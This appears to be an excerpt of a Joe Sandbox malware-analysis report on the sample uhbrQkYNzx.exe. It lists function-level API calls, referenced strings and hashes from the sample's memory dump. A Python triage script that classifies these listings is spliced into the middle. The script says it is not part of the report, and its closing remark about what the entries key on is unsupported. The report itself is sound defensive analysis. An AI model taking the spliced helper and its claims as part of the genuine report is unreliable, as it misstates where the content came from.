                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: .lnk$0$lnk
                                                              • API String ID: 176396367-906397761
                                                              • Opcode ID: 7a2c5ec6610be85a44d57734237f5109c1affe113949f7529c89161bf26a12e5
                                                              • Instruction ID: 45384500470ed3828b97dbf80991d1e385fba50f2c04c4eeb0c4260f954e5e6c
                                                              • Opcode Fuzzy Hash: 7a2c5ec6610be85a44d57734237f5109c1affe113949f7529c89161bf26a12e5
                                                              • Instruction Fuzzy Hash: 33E13771D012599FDF24DBA8CD85BDDB7B8BF49310F4044AAE409A3191EB349B88CF61
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 009B2B66
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                                • Part of subcall function 009A0BF3: _wcslen.LIBCMT ref: 009A0C03
                                                              • EndDialog.USER32(?,00000001), ref: 009B2EDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$DialogPathTemp
                                                              • String ID: $@set:user
                                                              • API String ID: 2172748170-1503366402
                                                              • Opcode ID: eccd1f02101ac6fd838b3e1d644c7eec668beb6bd707b03dcee72887d28b9179
                                                              • Instruction ID: 82c9fcf3d245fafcdad30ff7da93739e59c1fcd8794f75342b97dafe01ad036d
                                                              • Opcode Fuzzy Hash: eccd1f02101ac6fd838b3e1d644c7eec668beb6bd707b03dcee72887d28b9179
                                                              • Instruction Fuzzy Hash: D5C15930C052999EDF20EBA8CD85BEDBBB8AF55314F44009AE449B7192DB705F88CF61
                                                              APIs
                                                                • Part of subcall function 009A1309: __EH_prolog3.LIBCMT ref: 009A1310
                                                                • Part of subcall function 009A1309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,009A17FB,?,?,\\?\,1AC349C0,?,?,?,00000000,009CA279,000000FF), ref: 009A1319
                                                                • Part of subcall function 009A1AD1: __EH_prolog3_GS.LIBCMT ref: 009A1AD8
                                                                • Part of subcall function 0099F763: __EH_prolog3_GS.LIBCMT ref: 0099F76A
                                                                • Part of subcall function 0099F58B: __EH_prolog3_GS.LIBCMT ref: 0099F592
                                                                • Part of subcall function 0099F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,0099A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0099F5A8
                                                                • Part of subcall function 0099F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049), ref: 0099F5EB
                                                              • SHFileOperationW.SHELL32(?,?,?,?,00000000), ref: 009B2137
                                                              • MoveFileW.KERNEL32(?,?), ref: 009B22BE
                                                              • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 009B22D8
                                                                • Part of subcall function 009A14CC: __EH_prolog3_GS.LIBCMT ref: 009A14D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                                              • String ID: .tmp
                                                              • API String ID: 1688541384-2986845003
                                                              • Opcode ID: b907b6a43064e34f6a9d52f3a4394b80757043d249ca16986a0688897137286c
                                                              • Instruction ID: 92ecededbb00556afa66178e110c57d30d4011630c4389a117a9662bec410045
                                                              • Opcode Fuzzy Hash: b907b6a43064e34f6a9d52f3a4394b80757043d249ca16986a0688897137286c
                                                              • Instruction Fuzzy Hash: ECC1E071C002699ADF25DFA8CD84BDDBBB8BF49314F5041EAE449A3251DB349B89CF21
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0099A307
                                                              • GetLastError.KERNEL32(00000054,?,?,?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049), ref: 0099A427
                                                                • Part of subcall function 0099AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0099AC2E
                                                                • Part of subcall function 0099AC11: GetLastError.KERNEL32 ref: 0099AC72
                                                                • Part of subcall function 0099AC11: CloseHandle.KERNEL32(?), ref: 0099AC81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                              • API String ID: 2235100918-639343689
                                                              • Opcode ID: 48ad49f21adcc7b7231d4ce8b52a23bdc7ad232054a6633ba4cd13be8344b14d
                                                              • Instruction ID: 348fcb07ab54621dcd8aa4ba08aefbcd0d0a90b90c6e7896f52814136523f3e0
                                                              • Opcode Fuzzy Hash: 48ad49f21adcc7b7231d4ce8b52a23bdc7ad232054a6633ba4cd13be8344b14d
                                                              • Instruction Fuzzy Hash: 3E417F70E14208AFDF14EBACE986BEDB7B8EB49314F04401EF501B7291DB749944CB66
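                                                              As an added triage helper (not part of the Joe Sandbox report or its tooling), the following Python parses per-function "APIs" / "String ID" listings in the format shown on this page and flags the capability clusters an analyst pivots on: the SeRestorePrivilege / SeSecurityPrivilege strings in the entry directly above, the GetTempPathW entry, and the MoveFileW / MoveFileExW / SHFileOperationW entry with the ".tmp" string. The embedded input is a constructed excerpt copied from this listing; the capability rules and the function names (parse_listing, flag_capabilities, triage) are the helper's own assumptions, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox per-function API listings and flag capability clusters.

Added triage helper; not part of the Joe Sandbox report or its tooling.
The listing below is a constructed excerpt copied from the report's
"APIs" / "Similarity" blocks so the script runs offline. The capability
rules are this helper's own assumptions, not Joe Sandbox signatures.
"""
import re

# Constructed input: three function blocks taken from the listing above.
SAMPLE_LISTING = """\
APIs
• GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 009B2B66
  • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
• EndDialog.USER32(?,00000001), ref: 009B2EDA
Similarity
• API ID: _wcslen$DialogPathTemp
• String ID: $@set:user
APIs
• SHFileOperationW.SHELL32(?,?,?,?,00000000), ref: 009B2137
• MoveFileW.KERNEL32(?,?), ref: 009B22BE
• MoveFileExW.KERNEL32(?,00000000,00000004), ref: 009B22D8
Similarity
• API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
• String ID: .tmp
APIs
• __EH_prolog3_GS.LIBCMT ref: 0099A307
• GetLastError.KERNEL32(00000054,?), ref: 0099A427
  • Part of subcall function 0099AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0099AC2E
  • Part of subcall function 0099AC11: CloseHandle.KERNEL32(?), ref: 0099AC81
Similarity
• API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
• String ID: SeRestorePrivilege$SeSecurityPrivilege
"""

# One API reference line: optional "Part of subcall function ADDR:" prefix,
# then Name.MODULE, optional (args), then "ref: ADDR" (comma before ref is optional).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
# The "String ID" line lists the function's referenced strings joined by "$".
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*)$")


def parse_listing(text):
    """Return one dict per 'APIs' block: direct and subcall API refs plus strings."""
    funcs = []
    cur = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "subcalls": set(), "strings": []}
            funcs.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            call = {"name": m["name"], "module": m["module"],
                    "ref": m["ref"], "args": m["args"] or ""}
            if m["sub"]:
                call["via"] = m["sub"]          # reached through this subcall
                cur["subcalls"].add(m["sub"])
            cur["apis"].append(call)
            continue
        m = STRING_RE.match(line)
        if m:
            cur["strings"] = [s for s in m["strings"].split("$") if s]
    return funcs


def flag_capabilities(func):
    """Assumed triage rules over API names and strings; returns sorted flag names."""
    names = {c["name"] for c in func["apis"]}
    strings = func["strings"]
    flags = []
    if any(re.fullmatch(r"Se\w+Privilege", s) for s in strings):
        flags.append("privilege_names")      # token privilege strings referenced
    if names & {"GetTempPathW", "GetTempPathA"}:
        flags.append("temp_path")            # resolves %TEMP% (staging location)
    if names & {"MoveFileW", "MoveFileExW", "SHFileOperationW"}:
        flags.append("file_move")            # relocates dropped files
    if ".lnk" in strings:
        flags.append("shortcut_strings")     # shortcut handling
    if names & {"GetModuleFileNameA", "GetModuleFileNameW"}:
        flags.append("self_path")            # locates its own image on disk
    return sorted(flags)


def triage(text):
    """(first direct ref address, flags) for every function that raised a flag."""
    out = []
    for f in parse_listing(text):
        flags = flag_capabilities(f)
        if flags:
            direct = [c for c in f["apis"] if "via" not in c]
            out.append((direct[0]["ref"] if direct else "?", flags))
    return out


if __name__ == "__main__":
    for ref, flags in triage(SAMPLE_LISTING):
        print(f"ref {ref}: {', '.join(flags)}")
```

                                                              Run it over the full listing to get a per-function capability map; the ref address it reports is the first direct API reference in each block, which is what the "Snapshot File" IDA plugin entries also key on.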
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\uhbrQkYNzx.exe,00000104), ref: 009BEE6A
                                                              • _free.LIBCMT ref: 009BEF35
                                                              • _free.LIBCMT ref: 009BEF3F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                              • API String ID: 2506810119-2973279814
                                                              • Opcode ID: f7368914b78de1f47e6290757f348aa188f0fc70803d37fb25962f3b11311a61
                                                              • Instruction ID: f50e26a8448d32c5acd1b0d4ca06449fb843d2f9da05f651b71944721332d7f5
                                                              • Opcode Fuzzy Hash: f7368914b78de1f47e6290757f348aa188f0fc70803d37fb25962f3b11311a61
                                                              • Instruction Fuzzy Hash: AE318D71E08398AFDB21DB999D81EEEBBFCEB95320F14406AF4049B211D7719E40DB91
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 009B9E7B
                                                              • _abort.LIBCMT ref: 009B9F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              • Opcode ID: 7cde34839e313cc1d7f6cbe8ea81afff56419112f82ffb67689cda219919d909
                                                              • Instruction ID: 0f9e5b1d6415f7a669a381dbe299b2a1028cfa5209d8cad69d7382aad9b4ad9d
                                                              • Opcode Fuzzy Hash: 7cde34839e313cc1d7f6cbe8ea81afff56419112f82ffb67689cda219919d909
                                                              • Instruction Fuzzy Hash: 5A413971910209EFDF15DF94CE81AEEBBBABF48324F188159FA04A7261D335AD50DB50
                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 009A340E
                                                              • _strncpy.LIBCMT ref: 009A3459
                                                                • Part of subcall function 009A89ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,009DE088,?,00000007,009A33E2,?,?,00000050,1AC349C0), ref: 009A8A0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              • Opcode ID: 0813e9f3ced2344385ed1106bd3a925f0382dabce5dfb9219c1f2147999b57e5
                                                              • Instruction ID: c8a5bc2c7c5a25306dd9baad466139413b17c0fbb630f9540accdf338f4f7e4a
                                                              • Opcode Fuzzy Hash: 0813e9f3ced2344385ed1106bd3a925f0382dabce5dfb9219c1f2147999b57e5
                                                              • Instruction Fuzzy Hash: CD218F72900709ABDB10DEA8CC45FAE7BECBB4A310F044526FA1597191DB34EA158BA0
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009AF8F7
                                                                • Part of subcall function 00991E44: GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                                • Part of subcall function 00991E44: SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              • EndDialog.USER32(?,00000001), ref: 009AF99F
                                                              • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 009AF9E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogH_prolog3_Window
                                                              • String ID: ASKNEXTVOL
                                                              • API String ID: 2321058237-3402441367
                                                              • Opcode ID: e85824ffc92456b370b577bbabb8f1a87563f8e60b812abf900b67215648b777
                                                              • Instruction ID: 4b45eed502a9f09122cf33aa7637ed633fd382b1dcdc527038445fa79e3e06c1
                                                              • Opcode Fuzzy Hash: e85824ffc92456b370b577bbabb8f1a87563f8e60b812abf900b67215648b777
                                                              • Instruction Fuzzy Hash: 6B219E31610205BFCB10EFA8CC96FAA37A8BB8B344F110024F5419B2A1C7309E01DBA2
                                                              APIs
                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0099FEBD,00000008,00000004,009A2D42,?,?,?,?,00000000,009AABB6,?), ref: 009A7484
                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0099FEBD,00000008,00000004,009A2D42,?,?,?,?,00000000), ref: 009A748E
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0099FEBD,00000008,00000004,009A2D42,?,?,?,?,00000000), ref: 009A749E
                                                              Strings
                                                              • Thread pool initialization failed., xrefs: 009A74B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                              • String ID: Thread pool initialization failed.
                                                              • API String ID: 3340455307-2182114853
                                                              • Opcode ID: 6e72a9ab3ae46a9c6330834b048c241bbde35f64600851bd68622691c247cbb6
                                                              • Instruction ID: 20550ec58886831dfab14bf81c9ab605ef0d9d357cfa3709322c7cf7c439ebd0
                                                              • Opcode Fuzzy Hash: 6e72a9ab3ae46a9c6330834b048c241bbde35f64600851bd68622691c247cbb6
                                                              • Instruction Fuzzy Hash: 6C11A7B1648705AFD3315FAA9C859A7FFDDEB99744F10482EF1D9C2210D67059408B50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              • Opcode ID: c4bd5dddabcd06a9e517fe0d38bf52aa53e9527f0d0b801829b63a2861340191
                                                              • Instruction ID: 667fe2364b85a0aac450ea3221dc5a55c25dc083233b44c95af75595a0042885
                                                              • Opcode Fuzzy Hash: c4bd5dddabcd06a9e517fe0d38bf52aa53e9527f0d0b801829b63a2861340191
                                                              • Instruction Fuzzy Hash: 9311863072D345EBD710EF18EE84A567BE8E759765B054829F642C7321C2719C44FF62
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009BA843,00000000,?,009E6150,?,?,?,009BA9E6,00000004,InitializeCriticalSectionEx,009CF7F4,InitializeCriticalSectionEx), ref: 009BA89F
                                                              • GetLastError.KERNEL32(?,009BA843,00000000,?,009E6150,?,?,?,009BA9E6,00000004,InitializeCriticalSectionEx,009CF7F4,InitializeCriticalSectionEx,00000000,?,009BA79D), ref: 009BA8A9
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009BA8D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID: api-ms-
                                                              • API String ID: 3177248105-2084034818
                                                              • Opcode ID: 1d10913376051dcb789b65b0d6a3ee07341d75640d747070086a720116127536
                                                              • Instruction ID: a8707e9add74ae1990ee0c6fa7ab16d7dc144a6985ddc51a92e03ab5ed8ae598
                                                              • Opcode Fuzzy Hash: 1d10913376051dcb789b65b0d6a3ee07341d75640d747070086a720116127536
                                                              • Instruction Fuzzy Hash: C4E04870684205B7DF101FA0DD06F583E599B10B61F100034F94EA4CE0D761D911A6D6
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                              • Instruction ID: 601c55999e42a7e91099bad801630d00a1f7504ae6ad3768145fca91d26cd75e
                                                              • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                              • Instruction Fuzzy Hash: 25A12671E04786DFEB11CF28C891FAEBBA8EFD5350F18416DE5959B282C6388941CB52
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,009C0481,?,00000000,?,00000001,?,?,00000001,009C0481,?), ref: 009C3685
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009C370E
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,009BDBD1,?), ref: 009C3720
                                                              • __freea.LIBCMT ref: 009C3729
                                                                • Part of subcall function 009C040E: RtlAllocateHeap.NTDLL(00000000,009B535E,?,?,009B6C16,?,?,?,?,?,009B5269,009B535E,?,?,?,?), ref: 009C0440
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: fd2268f37edf02e270032f3f293b271f62df9994a126d7ccb8698549470f89a5
                                                              • Instruction ID: edd388d49e68e4716f1f65daea49d96ed3f8bd4192dd773173d2d4ba32d05da0
                                                              • Opcode Fuzzy Hash: fd2268f37edf02e270032f3f293b271f62df9994a126d7ccb8698549470f89a5
                                                              • Instruction Fuzzy Hash: 1C31D2B1E0020AABDF249F65DC81EEE7BA9EB44350F04812CFC04D6251EB36CE51CB91
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009A62D4
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 009A62EB
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 009A6328
                                                              • _wcslen.LIBCMT ref: 009A6338
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                                              • String ID:
                                                              • API String ID: 3741103063-0
                                                              • Opcode ID: a3bf4eae05f36e8f5c4cd4a8a9570dc3b58220fcd46d5380b25e4fb8f0ef4116
                                                              • Instruction ID: 711a03ffe094dba8a1245b9497b3381b86c811a2bf0b03f033c3d5973d8969cd
                                                              • Opcode Fuzzy Hash: a3bf4eae05f36e8f5c4cd4a8a9570dc3b58220fcd46d5380b25e4fb8f0ef4116
                                                              • Instruction Fuzzy Hash: 8A115171A1120AAFDF049F688985ABFBB79BF45354718411DA411E7240DF349D41CBE5
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 009A1273
                                                                • Part of subcall function 009A067E: GetVersionExW.KERNEL32(?), ref: 009A06AF
